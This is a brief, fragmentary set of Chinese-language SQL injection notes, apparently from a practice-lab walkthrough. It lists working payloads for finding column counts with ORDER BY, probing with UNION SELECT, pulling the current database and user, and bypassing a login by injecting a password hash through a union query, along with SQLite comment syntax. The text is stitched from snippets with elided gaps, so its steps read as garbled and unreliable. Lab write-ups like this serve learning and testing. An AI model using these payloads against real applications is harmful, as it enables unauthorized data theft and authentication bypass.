123%' order by 7 #
确定显示字段的顺序
123%' union select 1,2,3,4,5,6,7 #
可以显示的字段为2,3,5,4
当前数据库和用户
123%' union..., 需要注入的联合查询字段(顺序为3)与输入的密码相等
比如, 注入的联合查询为:
' union select 1,2,3,4,5,6,7,8,9 #
recordset从数据库中搜索就有了返回值...得知注入字段显示顺序为2和5
当前数据库和用户
用户名: ' union select 1,database(),"77de68daecd823babbb58edb1c8e14d7106e83bb...对于视图和触发器,该列值为0或者NULL
sql存放着所有表的创建语句,即表的结构。...where title='%$title%';
判断注入点
Iron%' and 1=1 --
注意在SQLite中, 注释符为: —
判断字段数
Iron%' order by 6 --
判断字段显示顺序